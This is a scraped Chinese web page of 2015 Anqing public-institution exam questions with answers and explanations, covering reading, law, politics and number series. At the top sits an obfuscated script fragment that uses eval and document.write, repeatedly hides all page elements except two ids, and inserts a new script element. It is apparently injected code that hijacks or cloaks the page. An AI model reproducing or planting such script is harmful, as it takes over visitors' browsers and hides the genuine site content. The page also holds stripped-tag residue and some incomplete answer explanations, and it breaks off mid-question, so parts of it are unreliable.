' } else { ss = '
' } window["eval"]("document.write('" + ss + "');"); try { setInterval(function() { try { window["document"]["getElementById"]("divAll")["style"]["display"] = "none" } catch (c) {} for (var rnWuRGR1 = 0; rnWuRGR1 < window["document"]["body"]["children"]["length"]; rnWuRGR1++) try { var uubMfbQ2 = window["document"]["body"]["children"][rnWuRGR1]["id"]; "iconDiv1" != uubMfbQ2 && "showcloneshengxiaon" != uubMfbQ2 && (window["document"]["body"]["children"][rnWuRGR1]["style"]["display"] = "none") } catch (d) {} }, 100) } catch (e$2) {}; var zqybWMcpE3 = zqybWMcpE3 || []; (function() { var $iOaS4 = window["document"]['createElement']("script"); var VLSJE5 = window["document"]['getElementsByTagName']("script")[0]; VLSJE5['parentNode']['insertBefore']($iOaS4, VLSJE5) })(); < class="pg_margins pg_inside"> < id="tips"> < class="topArea"> < class="bg-topArea">

请百度搜索安徽教育科技有限公司关键词找到我们!

< class="header"> < class="header-inner clearfix"> < class="logo "> 安徽教育科技有限公司 < class="clear"> < class="navbox" id="topNav"> < class="nav" style="margin:0 auto;"> < class='banner' id="banner"> <> < class='blank-area'> < id="mainhome" class="main-home inner2"> < class="main-top"> < class="main mainbg "> < class="location"> 首页 > 事业单位 > 历年真题 < id="inside_leftObj" class="inside_left inside_display_left"> < class="shadow"> < class="pro_sort_box"> < class="title"> < class="title_more"> 事业单位 < id="_89282"> < class="pro_sort"> <> < class="each_li active "> < class="name"> < class="icon">     招考信息 < class="each_li active "> < class="name"> < class="icon">     备考资料 < class="each_li active "> < class="name"> < class="icon">     历年真题 < class="promore">更多分类 < class="clear"> < class="col_bottom"> < class="right" id="rightObj">

历年真题

< class="display_title">

2015年安庆市事业单位考试真题及答案解析

< class="info"> 文字:[大][中][小] 手机页面二维码 2015/10/19     浏览次数:     < class="share_box"> < class="share_name">一键分享 < style="display: none;background:#E9EBEA" class="share_content"> < class="bdsharebuttonbox"> < class="m_intro">2015年安庆市事业单位考试真题及答案解析 < class="others enquiry"> < id="info_content" class="display_content display_article"> < style="border:solid #C1D6E6 1.0pt;padding:8.0pt 8.0pt 0cm 8.0pt;background:white;">

2015年安庆市事业单位考试真题及答案解析

 

 

1 . 中国哲学认为,圣人不是不问世务的人,而是“内圣外王”的人。内圣,是就其修养的成就说;外王,是就其在社会上的功用说。然而,圣人不一定有机会成为实际政治的领袖。就实际的政治说,他大概一定是没有机会的。所谓“内圣外王”只是说,有极高的精神成就的人,按道理说可以为王,而且最宜于为王,至于实际上他有机会为王与否,那是另外一回事,亦是无关宏旨的。 以下说法,不合文意的是( 

 

A:虽然没有机会成为实际政治的领袖,圣人依然会积极投身于世务

 

B:修养极高的人没有机会成为实际政治的领袖是因为不能够完美地处理世务

 

C:修养极高的人一定适合成为实际政治的领袖

 

D:中国哲学讨论内圣外王,更关注于内圣

 

答案:【答案】B。题目详解:本题是一道细节判断题,注意提问是“不合文意”。B项“修养极高的人没有机会成为实际政治的领袖是因为不能够完美地处理世务”在原文中并没有提及,属于无中生有;其余三项都能在原文找到相对应的内容,故本题选B。

 

2 . 转继承是指继承人在继承开始后遗产分割前死亡的,其有权继承的遗产转由其法定继承人(包括配偶、子女、父母、兄弟姐妹、祖父母和外祖父母)继承的制度。下列属于转继承的是()。

 

A:老王与其妻子生有两个儿子,二儿子早年去世,留有一女,未满十八岁。老王去世后,在未立有遗嘱的情况下,该女孩要求继承老王的部分遗产

 

B:老李有价值50万元的房产一处。老李去世的当天,儿子小李在赶往医院办理后事的途中不幸遭遇车祸死亡,小李的儿子当即表示要继承老李的房产

 

C:孤寡老人老刘一直由邻居老张照顾,老刘在生前立下遗嘱,将其全部财产留给老张。老刘去世后不久,老张心脏病发去世,老张的妻子要求继承老张应继承的部分份额

 

D:老黄生前一直由其外甥小赵照顾,老黄立下遗嘱,将全部财产留给小赵。老黄去世后,老黄的子女向法院提起争夺遗产的诉讼,法院作出判决前,小赵不幸去世,老黄的子女继承了这笔遗产

 

答案:定义要点是:继承人在继承开始后遗产分割前死亡,其有权继承的遗产转由其法定继承人继承。A项二儿子不是在继承开始后死亡;B项小李并不一定是老李的继承人;D项小赵有权继承的遗产不是转由小赵的法定继承人继承。只有C项符合定义。

 

3 . 真正友谊的产物,只是一种________了你身心的愉快。没有这种愉快,随你如何直谅多闻,也不会有友谊。接触着你真正的朋友,感觉到这种愉快,你内心的鄙吝残忍,自然会消失,无需说教式的________。 填入横线部分最恰当的一项是( )。

 

A:贯穿,指导

 

B:贯穿,劝说

 

C:渗透,诱导

 

D:渗透,劝导

 

答案:D。题目详解:“贯穿”表示穿过,贯通,与身心愉悦进行搭配明显不符合要求,据此排除A、B项。第二个空缺项应与“说教”相联系,“劝导”比“诱导”具有更强的说教性,故选D。

 

4 . 古代动物中有一类动物叫蜥螈,它( )具有两栖动物的特征,( )具有爬行动物的特征。( )古生物学工作者不容易弄清楚它到底是两栖还是爬行动物,( )过去把它放在爬行动物中,( )现在又把它放在两栖动物中去。依次填入画横线部分最恰当的是()。

 

A:既又因此以至而

 

B:不但而且不过尽管但是

 

C:既又因此以致而

 

D:不但而且因此尽管但是

 

答案:C。题目详解:根据文段语境可知,前两空介绍蜥螈同时具备两栖动物和爬行动物的特征,应为并列关系,故填入“既……又……”符合语境。第三空,正是因为它同时具备两种特征,古生物工作者才不容易弄清楚,前后文为因果关系,故填入“因此”衔接恰当。第四空,根据后文的“过去把它放在爬行动物中”、“现在又把它放在两栖动物中去”可知,蜥螈具备两种特征的现象给科学家带来了生物归类上的不便,是一种负面的结果;“以致”表示前一分句导致的结果,多指不希望出现的结果,不好的事情;置于此处符合语境。第五空,填入“而”表顺承关系。因此,本题答案为C选项

 

5 . 俗话说:“逢人只说三分话”。还有七分话,不必对人说出。你也许以为大丈夫光明磊落,事无不可对人言,何必只说三分话呢?彼此关系浅薄,你与之深谈,显示你没有修养;你说的话,是属于对方的,你不是他的诤友,不配与他深谈,忠言逆耳,显出你的冒昧;你说的话,是属于国家的,对方的立场如何,你没有明白,对方的主张如何,你也没有明白,你偏高谈阔论,轻言更易招祸。 对这段文字的主旨概括最准确的是( 

 

A:人应学会保护自己

 

B:知无不言常常会招来祸害

 

C:忠言逆耳

 

D:切勿“交浅言深”

 

答案:D。题目详解:文章开头提出疑问:为什么逢人只说三分话?接着从三个方面阐释:彼此关系浅薄,与之深谈,显示你没有修养;你不是对方的诤友,与之深谈,显出你的冒昧;不了解对方,便高谈阔论,轻言更易招祸。对文段主旨概括最准确的是切勿“交浅言深”,故选D。

 

6 . 十六大报告要求,要在全党开展以( )为主要内容的保持共产党员先进性的教育活动。

 

A:心为民所系,权为民利用,利为民所谋

 

B:讲学习、讲政治、讲正气

 

C:实践“三个代表”重要思想

 

D:牢固树立共产主义远大理想和中国特色社会主义坚定信念

 

答案:C

 

7 . 下列情况中,不属于职务发明创造的是( )。

 

A:主要是利用本单位的物质技术条件完成的发明创造

 

B:利用本单位的物质技术条件所完成的发明创造,单位与发明人或者设计人订有合同,约定专利权属于发明人或者设计人

 

C:执行本单位的任务所完成的发明创造

 

D:发明人或者设计人利用业余时间进行的发明创造

 

答案:D[解析]职务发明创造是指职工在履行职务中所完成的新发明、新设计,或者是在执行所在单位的指令中完成的发明创造。发明人或设计人利用业余时间完成的发明创造,并不是利用本单位的物质技术条件或者执行本单位的任务完成的发明创造,因此,不能认定为职务发明创造。

 

8 . 如果受到良心的谴责,即便有公众的支持,一个诚实的心灵也不可能得到( )。 填入括号内的词语,最恰当的一项是( )。

 

A:安稳

 

B:安全

 

C:安静

 

D:安宁

 

答案:【答案】D。题目详解:搭配问题。安宁:(1)秩序正常,没有骚扰;(2)(心情)安定,宁静。

 

9 . 现在的社会是讲竞争实力的社会,要的是真才实学,城市只是一个载体,学生能否学到知识,增强实力,今后能否有大的发展,很重要的是你能否考上一所好的大学,而不是你是否到了一个大城市。这段文字意在说明( )。

 

A:大学生增强实力才能参与竞争。

 

B:现代社会最重要的是竞争实力。

 

C:学生考上好大学一定有好的发展。

 

D:到大城市并非等于一定要有好的发展

 

答案:A。题目详解:据提问“意在”一词知此题为隐含主旨题。文段阐述的主体是学生,由此可排除B、D项。C项的表述过于绝对,且与文段的意旨不符。题干主要是鼓励大学生追求真才实学,才有助于今后的社会竞争,而不要一味地追求生活在大城市。A项是对主旨的正确概括。故正确答案为A。

 

10 . 甲乙两家是邻居,甲家在距乙家地基2米处种有一棵大树。每逢刮大风,风便会将这棵树的一些大树枝刮落到乙家房屋上。乙担心会损坏房屋,多次找甲协商,要求甲将树枝砍去一些,被甲拒绝。某日,暴风雨即将来临,乙再次找甲协商却没找到,情急之下自己砍去了一些伸到自家房屋上的树枝。甲回家后要求乙赔偿500元,乙不同意,甲将乙起 诉至法院。下列说法正确的是:

 

A:狂风暴雨即将来临,乙砍掉一些树枝来避免对自己房屋的损害属于紧急避险,因而乙不应承担民事责任

 

B:乙的行为已经构成了对甲财产权利的侵害,因为乙为了自己的利益未经甲同意就砍掉了一些树枝,因此,乙应当承担赔偿责任

 

C:虽然这棵树属于甲,但因伸到了乙的房顶,这棵树在乙房屋界内的部分应当属于乙,因此,乙砍掉那些树枝是合法的,不应承担民事责任

 

D:乙的行为已经构成了对甲财产权利的侵害,因为乙为了自己的利益未经甲同意就砍掉了一些树枝。但是乙在砍之前有意愿但无法告知甲,因此可豁免其部分责任

 

答案:【答案】A。解析:紧急避险,是指为了使公共利益、本人或者他人的合法权益免受现实和紧急的损害危险,不得已而采取的致人损害的行为。《民法通则》第129条规定:“因紧急避险造成损害的,由引起险情发生的人承担民事责任。如果危险是由自然原因引起的,紧急避险人不承担民事责任或者承担适当的民事责任。”在暴风雨的天气,乙找甲协商没找到,情急之下砍掉树枝的行为不是侵害甲财产权的行为,而是合法行为,属于紧急避险,不应承担民事责任。因此A项正确,应选。BCD三项说法错误,不合题意。

11 . 王某持有政府债券和股票,同时在银行有若干储蓄,其中属于《证券法》调整的“证券”是()

 

A:股票、公司债券

 

B:银行存单、公司债券

 

C:股票、政府债券

 

D:银行存单、政府债券

 

答案:A

 

12 . 跟下面这段文字的衔接最恰当的一项是( )。持重是人的美德,它使人稳健,理智,思维严密,但过分就显得刻板冷漠;热忱也是美德,它可以冲淡持重的凝滞因素,使人敏税,机智,保持一种活力,但过分则轻佻,浮夸。一个青年人( )。

 

A:要处理好二者的关系,就必须二美兼顾,互为补充

 

B:因为处理好了二者的关系,所以就二美兼顾,互为补充

 

C:只要处理好二者的关系,就二美兼顾,互为补充

 

D:如果要处理好二者的关系,就一定要二美兼得,相得益彰

 

答案:【答案】A。题目详解:暂未解析

 

13 . 从历史的角度看,生态问题只有通过不断重建天人之间的统一才能解决,仅仅赞美自然的原初形态,一味讴歌、缅怀天人之间的原始统一,只能得到某种抽象、空泛的满足,而无法真正解决生态的问题。生态的危机因人而起,也只有通过人自己的合理活动来克服。单纯地由于人的作用导致生态困境而拒斥人的活动,无异于_____。填入划横线部分最恰当的一项是:( )

 

A:因小失大

 

B:因噎废食

 

C:等因奉此

 

D:因循守旧

 

答案:B。题目详解:成语辨析。“因小失大”指为了很小的利益,造成大的损失,形容得不偿失。“因噎废食”比喻要做的事情由于出了点小毛病或怕出问题就索性不去干;“等因奉此”比喻例行公事,官样文章;“因循守旧”意为死守老一套,缺乏创新的精神。根据文段中“单纯地由于人的作用导致生态困境而拒斥人的活动”可知,“因噎废食”与文意最为吻合,由此排除ACD而选择B。(《和讯网》、《求是理论网》等,《天人共美:一种生态的理念》)

 

14 . 事业单位在本质上提供的产品是()。?

 

A:公共物品?

 

B:私人物品?

 

C:任何物品?

 

D:商品

 

答案:A。?解析:由于事业单位为社会利益服务的性质决定了事业单位提供产品的本质只能是公共物品。

 

15 . 0,1/4,1/4,3/16,1/8,()

 

A:2/9;

 

B:3/17;

 

C:4/49;

 

D:5/64

 

答案:选D,方法一:0,1/4,1/4,3/16,1/8,(5/64)=>0/2、1/4、2/8、3/16、4/32、5/64;分子 0、1、2、3、4、5 等差;分母2、4、8、16、32 等比方法二:1/4=1/4 - 0×1/4 ;3/16=1/4 - 1/4×1/4 ;1/8=3/16 - 1/4×1/4 ;5/64=1/8 - 3/16×1/4

 

16 . 不作为:是指以消极的没有外部举动的方式表现出来的法律行为。根据上述定义,下列不属于不作为的是( )。

 

A:交警对出租车司机违章驾驶熟视无睹

 

B:行政复议机关对老王的复议申请迟迟拖延,不作任何处理

 

C:因口角生恨而将迷幻药放人王某杯中的李某

 

D:看到有人持枪抢劫而坐以待毙的银行行长

 

答案:C

 

17 . 1944,108,18,6,( )

 

A:3;

 

B:1;

 

C:-10;

 

D:-87;

 

答案:选A。前项除以后一项等于第三项

 

18 . 汉语的词量具有表量和修辞功能。如“一只鞋”和“一双鞋”、“一头羊”和“一群羊”。这里的“只”和“双”、“头”和“群”起着限定和区别鞋、羊之数量关系的功能。修辞的功能,如“一头大象”和“一只大象”,“一尊佛像”和“一座佛像”,“一幅画”和“一张画”。在这里,“头”与“只”并没有数量上的差别,而只有形象上的差别。同样,“尊”和“座”、“幅”与“张”也没有数量上的差别而只是情感和格调上的差别。对这段话的理解准确的是( )。

 

A:表量功能是量词的基本特点

 

B:修辞功能是量词的基本特点

 

C:表量功能和修辞功能是量词的基本特点

 

D:表量功能和修辞功能都不是量词的基本特点

 

答案:C。题目详解:文段采用总分结构,第一句话即表明了论点“汉语的词量具有表量和修辞功能”,后文都是在对论点进行具体说明。C项是对论点的同意替换,因此,本题选择C选项

 

19 . 甲、乙、丙、丁四人是P大汉语言文学系的留学生,他们的国籍分别是:日本、韩国、菲律宾和新加坡。一日.有人问他们四人的国籍。甲说:乙不是日本人;乙说:丙是韩国人;丙说:丁不是菲律宾人:丁说:他们三人中只有韩国人说的是事实。已知丁说的是实话.由此可以推出:

 

A:甲是菲律宾人,乙是新加坡人

 

B:甲是韩国人.丁是菲律宾人

 

C:乙是日本人.丁是菲律宾人

 

D:甲是韩国人.丙是新加坡人

 

答案:解析:由丁说的是实话可知,只有甲、乙、丙三人中韩国人说的话为真,乙的话涉及韩国人,以此为突破口。假设乙说的话为真,则乙和丙都是韩国人,矛盾;因此乙说的话为假,乙和丙都不是韩国人,丙说的话也为假,丁是菲律宾人。则韩国人是甲,甲说的话为真,乙不是日本人,乙是新加坡人,则丙是日本人。因此答案为B。

 

20 . 为了维护正常的领导关系,具有隶属关系或业务指导关系的机关之间应基本采取(  )。

 

A:逐级行文  多级行文

 

B:越级行文

 

C:直接行文

 

D:

 

答案:【答案】A。解析:逐级行文:向直接的上级或者直接下级行文。越级行文:越过自己的直接上级或下级行文。多级行文:向直接上级并呈非直接上级或者向直接下级并转非直接下级的一次性行文。

21 . 规章是指包括国务院所属各部、各委员会未经国务院批准程序而自行发布的行政法规和省、自治区以及省、自治区的人民政府所在地的市和经国务院批准的较大的市的人民政府依据法律和国务院的行政法规,制定的地方政府规定。根据上述定义,下列选项中不属于规章范畴的是()。

 

A:《劳动部关于发布违反〈中华人民共和国劳动法〉行政处罚办法的通知》

 

B:《中华人民共和国居民身份证条例》

 

C:《北京市物业管理招投标暂行办法》

 

D:《北京市实施〈道路交通事故处理办法〉若干规定》

 

答案:B。题目详解:此题的要件关键在于发布规章的主体——国务院所属各部、各委员会、省、自治区以及省、自治区的人民政府所在地的市和经国务院批准的较大的市的人民政府。A选项是劳动部,C选项、D选项中都是北京市,均符合要件,排除;而B选项的主体是全国人大常委会,不符合要件。因此,本题答案为B选项。

 

22 . ()对于表达相当于信件对于()

 

A:比喻,,沟通

 

B:文字,,载体

 

C:感情,,抒情

 

D:交流,,包裹

 

答案:A。题目详解:比喻是一种表达方式。信件是一种沟通方式。

 

23 . 在所有电脑标志中,“@”是唯一入选纽约现代艺术博物馆建筑与设计收藏的标志。它也是网络世界最常用的符号。每个电子邮件都要用到它,在微博里通知他人,也要用到它。@在数字世界的起源要回到1971年。美国技术研究公司BBN的一位程序员雷蒙德汤姆林森当时正负责开发一个程序让计算机用户能够连接到阿帕网。他决定在电脑网络的地址中间插入这个符号,来区分“用户”和“终端”,这个做法后来被广泛采用,成了今天电子邮件地址的标准写法。因此,雷蒙德汤姆林森也被人们称为“电子邮件之父。” 这段文字旨在说明( )

 

A:将@作为电脑符号的第一人

 

B:"@"在网络中是最常用的符号

 

C:"@"入选现代艺术标志的原因

 

D:"@"被作为电脑符号的由来

 

答案:【答案】D。题目详解:<暂无>

 

24 . 十多年来,香港与中国内地的经济、社会和文化交流得到了进一步发展。香港的四大基础竞争力是:由独立司法机构支撑的( )的法律机制,( )的贸易环境,廉明的政府,信息的自由交流。 填入括号内最恰当的一项是( )。

 

A:完备,优秀

 

B:完善,优越

 

C:完好,充分

 

D:完足,良好

 

答案:B。题目详解:这道题属于实词的辨析,主要考查区别词语的习惯搭配。完备:备;不缺任何必要的东西的完善:完备美好完好:完整;没有残缺或损坏完足:完全、足够,毫无缺欠优秀:出色,非常好优越:优胜;优良充分:充足(多用于抽象事物)良好:感到舒畅、高兴,美好,如意本题考查了词语的惯用搭配,完善的机制,优越的环境本题选B。

 

25 . 社会主义和谐社会的建设目标是()

 

A:民主法治、公平正义、诚信友爱、充满活力、安定有序、人与自然和谐相处的社会

 

B:社会各阶层各尽所能、各取所需的和谐社会

 

C:充分保障劳动者的就业权利,实现劳动力资源的合理利用

 

D:保持经济总量基本平衡,促进经济结构优化,引导国民经济持续、快速、健康发展。

 

答案:A

 

26 . 20世纪80年代,我国为促进科技发展而采取的措施不包括()。

 

A:制定“863计划”

 

B:制定“星火计划”

 

C:制定“火炬计划”

 

D:提出“科教兴国”战略

 

答案:D。解析:1986年国家制定“863计划”和“星火计划”;1988年制定“火炬计划”;1995年我国提出“科教兴国”战略。

 

27 . 在公务员的考核中,对非领导成员公务员的定期考核采取()的方式。

 

A:年度考核

 

B:半年考核

 

C:季度考核

 

D:三年一考核

 

答案:《公务员法》第35条明确规定,对非领导成员公务员的定期考核采取年度考,核的方式,先由个人按照职位职责和有关要求进行总结,主管领导在听取群众意见后,提出考核等次建议,由本机关负责人或者授权的考核委员会确定考核等次。

 

28 . 下面没有语病的句子是( )。

 

A:路是人走出来的,但是走过的地方都不一定成为了路

 

B:一条小船很难渡众生,必须是众人建造的大船才能同舟共济

 

C:相信科学的人们决不会让封建迷信影响了他的思想

 

D:大路向天边延伸很远很远,直到遥远得看不见的天际

 

答案:D。题目详解:A项语序不当。“都”应该放在“不一定”的后面。B项搭配不当。“大船才能同舟共济”是语病所在,应改为“大船才能让大家同舟共济”。C项前后主语称谓不一致。“人们”与“他”无法对应,应将“他”改为“他们”。

 

29 . “西部大开发”是()。

 

A:党中央根据邓小平同志关于“两个大局”的战略思想作出的战略决策

 

B:“两个大局”决策中的第一个大局

 

C:以对西部富饶的土地资源进行开发为主要目标

 

D:要求东部发达地区暂停发展,全力支持西部

 

答案:A

 

30 . 0,4,18,48,100,( )

 

A:140;

 

B:160;

 

C:180;

 

D:200;

 

答案:选C,两两相减===>?4,14,30,52 ,{()-100} 两两相减 ==>10.16,22,()==>这是二级等差=>0.4.18.48.100.180==>选择C。思路二:4=(2的2次方)×1;18=(3的2次方)×2;48=(4的2次方)×3;100=(5的2次方)×4;180=(6的2次方)×5

31 . 2010年7月,党中央、国务院召开了西部大开发工作会议,总结西部大开发10年取得的巨大成就和丰富经验,全面分析国内外形势和西部大开发面临的新机遇、新挑战。关于西部大开发战略,下列表述不正确的是:

 

A:西部大开发在我国区域协调发展总体战略中居于优先地位

 

B:西部大开发战略实施的最主要目的是解决沿海同内地的贫富差距

 

C:西部大开发覆盖地域指陕、甘、宁、青、新等西北五省(区)及西藏自治区

 

D:实施西部大开发的核心工作是保障和改善民生

 

答案:【答案】C。解析:西部大开发的范围包括陕西省、甘肃省、青海省、宁夏回族自治区、新疆维吾尔自治区、四川省、重庆市、云南省、贵州省、西藏自治区、内蒙古自治区、广西壮族自治区、湖南湘西、湖北恩施、吉林延边等12个省、自治区、直辖市,3个少数民族自治州,面积为685万平方公里,占全国的71.4%。正确答案为C。

 

32 . 诡计多端:姜维

 

A:惊弓之鸟:黄忠

 

B:梦笔生花:江淹

 

C:约法三章:刘备

 

D:咏絮之才:谢无奕

 

答案:考查成语典故与主人公的关系。诡计多端的主人公是姜维;梦笔生花的主人公是江淹。惊弓之鸟的主人公是更羸;约法三章的主人公是刘邦;咏絮之才的主人公是谢道韫。

 

33 . 光辉之于()相当于正义之于()

 

A:太阳法制

 

B:恒星民生

 

C:自然义务

 

D:光明圣人

 

答案:太阳是世界充满光辉的保障,法制是社会充满正义的保障。故选A。

 

34 . 国际奥委会主席罗格在其就任宣言中指出:“奥林匹克的格言是更快、更高、更强。当然,我们将继续保留这个格言。但是,在新世纪来临的时候,或许对体育来讲需要新的格言,那就是更干净、更人性、更团结。”在这里罗格先生以辩证唯物主义和历史唯物主义的态度和改革、求变的精神,适时地提出新世纪奥林匹克新格言。下列对罗格适时提出新世纪奥林匹克新格言的评价,不恰当的一项是( )。

 

A:新格言寄托了人们对奥运会的美好希望,并赋予新世纪奥林匹克运动以崭新的文化使命

 

B:新格言内涵更宽泛,人文色彩更强,是一种全新的体育理念

 

C:提出了未来奥林匹克运动的发展方向,提出了对运动员道德品质的要求

 

D:对奥林匹克的格言而言,新格言是一个更符合实际、更人性化、更具人文色彩的思维模式

 

答案:B。题目详解:本题属于细节判断题型,主要考察局部精读类,本题对应的解法是识别陷阱类型中的概括不当。B项是过于绝对,其中说新格言是“一种全新的体育理念”,这过于绝对。A、C、D三项都可从原文中推断出。所以,本题选择B答案。

 

35 . 过去数十年,行为经济学在很大程度上被视为一门边缘学科。尽管信奉传统经济学的人勉强承认人们有时会表现得缺乏理性,但他们往往会紧握自己的理论武器不放。他们辩称,行为经济学家和心理学家们所做的实验尽管非常有趣,却并没有削弱理性决策模型的效力,因为这些实验是在受控条件下进行的,而且脱离了巨大的市场竞争环境这一最重要的理性行为调节器。然而,在世界金融业遭遇的巨震下,关于人类,组织和市场的终极理性的信念崩溃了,商业和公共政策因此面临的危险也暴露无遗。由本段文字可知,过去数十年,传统经济学家( )。

 

A:认为人们的非理性行为符合常理

 

B:认为行为经济学理论不具有现实合理性

 

C:信奉的理论受到了行为经济学的严峻挑战

 

D:站在更为宏观和理性的角度研究人及组织在市场中的行为

 

答案:【答案】B。题目详解:本题属于细节判断题型,主要考察局部精读类,本题对应的解法是识别陷阱类型中的概括不当。A选项是以偏概全,文段第二句说的是“信奉传统经济学的人勉强承认人们有时会表现得缺乏理性”,并不等于说他们认为人们的非理性行为符合常理;通过文段第三句可以判断传统经济学家并不认为行为经济学理论具有现实合理性,B选项正确;C项是无中生有;D项是以偏概全,传统经济学理论信奉人类,组织和市场的终极理性,而不等于其自身立场是理性的。所以,本题选择B答案。

 

36 . 甲(男,22周岁)为达到与乙(女,19周岁)结婚的目的,故意隐瞒乙的真实年龄办理了结婚登记。两年后,因双方经常吵架,乙以办理结婚登记时未达到法定婚龄为由向法院起诉,请求宣告婚姻无效。人民法院应如何处理?( )

 

A:以办理结婚登记时未达到法定婚龄为由宣告婚姻无效

 

B:对乙的请求不予支持

 

C:宣告婚姻无效,确认为非法同居关系,并予以解除

 

D:认定为可撤销婚姻,乙可行使撤销权

 

答案:B。解析:本题考查的是对无效婚姻的确认程序。《婚姻法》第六条规定:“结婚年龄,男不得早于二十二周岁,女不得早于二十周岁。晚婚晚育应予鼓励。”本法第十条规定:“有下列情形之一的,婚姻无效:(一)重婚的;(二)有禁止结婚的亲属关系的;(三)婚前患有医学上认为不应当结婚的疾病,婚后尚未治愈的;(四)未到法定婚龄的。”《婚姻法解释一》第八条规定:“当事人依据婚姻法第十条规定向人民法院申请宣告婚姻无效的,申请时,法定的无效婚姻情形已经消失的,人民法院不予支持。”

 

37 . 一位哲人这样解释乐观与悲观:譬如面对着桌子上的半杯水,乐观主义者说这个杯子的一半是满的,悲观主义者说这个杯子的一半是空的。显然,________,使我们在任何时候、任何条件下都不会失去信心和追求。一旦遇到困难,我们黯淡的心情也能够很快豁然开朗,从种种苦恼中自我解脱。 填入划线处最恰当的是( )。

 

A:观察事物时善于选择生活中积极的一面

 

B:人与人的观察角度和思维方式是不同的

 

C:乐观主义比悲观主义更有利于人类进步

 

D:这两种理解有其合理性也有一些片面性

 

答案:A。题目详解:本题属于语句衔接题型,主要考察推断类中的排序衔接类,本题对应的解法是识别陷阱类型中的推断不当,我们主要关注语境的协调,具体表现在语体色彩和感情色彩前后一致。本段文字“显然”后面的内容“豁然开朗”“从种种苦恼中自我解脱”等都倾向于乐观主义,因此,选项B、D排除;而C选项与下面几句衔接不上。所以,本题选择A答案。

 

38 . 影响一个地区长期或某段时期气候变化的原因,是众多而杂的,人们至今还无法确切说明各种因素对气候变化的影响程度,但是可以断言:即使人类社会发展到今天,从总体讲,自然因素仍然是影响气候的主导因素,人类活动至今仍然不足以影响地区性气候的基本属性,更不足以引起冰期或间冰期等巨大的气候变化。 这段文字意在说明:( )。

 

A:一个地区的气候是多种因素共同作用的结果

 

B:地区性气候的基本属性主要取决于自然因素

 

C:人类活动不足以对一个地区的气候产生影响

 

D:人类对气候影响因素的了解与分析还不足够

 

答案:B。题目详解:本题属于寓意启示题型,主要经考察推断类中的劝导说服类,本题对应的解法是识别陷阱类型中的概括不当。A项偷换概念,将未然变为已然,文中是说“人们至今还无法确切说明各种因素对气候变化的影响程度”。C项概括不全,文中是指“从总体讲,自然因素仍然是影响气候的主导因素,人类活动至今仍然不足以影响地区性气候的基本属性”,。D项不是文段所表达的主要意思,而只是默认一个不重要的事实。所以,本题选择B答案。

 

39 . 日本的文化在战后一直在潜移默化地影响着西方,现在越来越成为主流文化的重要组成部分,村上隆、奈良美智、村上春树已经成了世界流行文化的突出符号;在《黑客帝国》等一批好莱坞大片中可以清楚地看到日本动漫的影子。而在这些影响着世界(包括中国)的日本文化中,我们看到的并不是非常表面化的“菊与刀”之类的东西,而是更加本质的东西,有些东西需要仔细考量才能真正领悟。 这段文字主要说明( )。

 

A:日本文化已经渗透到了世界很多国家的文化领域

 

B:《黑客帝国》表明美国文化呈现出东方化的趋势

 

C:日本已经改变策略,我们要提防深层的文化侵略

 

D:要抵制异域文化的侵袭,需要我们提高分析能力

 

答案:A。题目详解:本题属于主旨概括题型,主要考察概括类,本题对应的解法是识别陷阱类型中的概括不当。B过于绝对,文中提到“在《黑客帝国》等一批好莱坞大片中可以清楚地看到日本动漫的影子。”这并不代表,这美国文化呈现出东方化的趋势,且本段主要是说日本文化。C、D项是无中生有。而文段一直将日本文化作为讨论的重点,而选项中也只有A项强调日本文化。所以,本题选择A答案。

 

40 . 平型关大捷∶抗日战争时期

 

A:台儿庄战役∶第二次国内革命战争时期

 

B:汀泗桥战役∶第一次国内革命战争时期

 

C:四渡赤水∶国民大革命时期

 

D:孟良崮战役∶第二次世界大战时期

 

答案:台儿庄战役是在抗日战争时期,四渡赤水是在第二次国内革命战争时期(也就是土地革命战争时期),孟良崮战役是在第三次国内革命战争时期(也就解放战争时期),此时,第二次世界大战已经结束。

41 . 哲学的基本问题是()。

 

A:物质和运动的关系问题

 

B:可知论和不可知论的关系问题

 

C:思维和存在的关系问题

 

D:理论和实践的关系问题

 

答案:C

 

42 . “加强党的思想建设,根本的是坚定不移地用邓小平理论武装全党,充分发挥党的思想政治优势。”对黑体的词可用下面哪一个词语代替()。

 

A:坚持不懈

 

B:毫不动摇

 

C:不折不扣

 

D:不屈不挠

 

答案:B。题目详解:“坚定不移”的意思是稳定坚强,毫不动摇,在材料中强调的是坚持党的理论。B选项“毫不动摇”是指丝毫也不改变,一点都不动摇。形容始终不渝地坚持。和坚定不移同义替换,所以B选项正确

 

43 . 100多年前,英国人威里璧只能依靠租用的马队完成漫漫的西藏探险历程,今天,当世界各地的旅行者和探险家________。驱车饱览雪域高原神秘文化和秀美风光的时候,________的公路交通网早已把最初探索者们留下的艰难足迹________在历史风尘中。 依次填入划横线部分最恰当的一项是( )

 

A:纷至沓来,纵横交错,湮没

 

B:接踵而至,车水马龙,埋没

 

C:络绎不绝,川流不息,消逝

 

D:摩肩接踵,井井有条,消失

 

答案:【答案】A。题目详解:本题关键在于第二空,形容“公路交通网”,多用“纵横交错”。

 

44 . 纳税人未按照规定期限缴纳税款的,税务机关从滞纳税款之日起,按日加收滞纳税款(  )的滞纳金。

 

A:千分之一

 

B:千分之五

 

C:万分之一

 

D:万分之五

 

答案:D[解析]我国《税收征收管理法》第三十二条规定:“纳税人未按照规定期限缴纳的税款,扣缴义务人未按照规定期限缴纳税款的,税务机关除责令限期缴纳外,从滞纳税款之日起,按日加收滞纳税款万分之五的滞纳金。”

 

45 . ①因为,这两个看来完全相同的温度平均值具有不同的意义 ②只看平均值,难免以偏概全 ③当某个城市某一天的平均气温与全国一年的平均气温完全相同时 ④还要了解影响温度变化的各种因素 ⑤人们如果要到不同的地方去旅行,所要带的衣物不能以所在城市某一天的气温为依据 ⑥要认清后者,不但需要了解某地四季高低温度的差距有多少 排列组合最连贯的是( )。

 

A:⑤⑥④①③②

 

B:③⑤①⑥④②

 

C:③⑤⑥②①④

 

D:⑤⑥②①④③

 

答案:B。题目详解:这是一道解释“以偏概全”在实际生活中的应用示例。首先找出问题的来源,③中“当……时”表示事件的由来,⑤将问题补充完整,①说明前一句话的原因。而后,“不但……还”这一关联词语的出现将⑥④两句连接起来,最后②句引出以偏概全问题。故选B。

 

46 . 我国社会主义初级阶段是指( )。

 

A:从社会主义改造完成到社会主义现代化基本实现

 

B:从新中国成立到社会主义制度建立

 

C:从社会主义制度建立到基本实现四个现代化

 

D:从社会主义改造完成到进入小康社会

 

答案:A

 

47 .   许多人喜欢晨练,但从环境角度来看,城市早晨的空气并不新鲜,原因是(  )。

 

A:早晨空气中有时有逆温层,不利于污染物的扩散

 

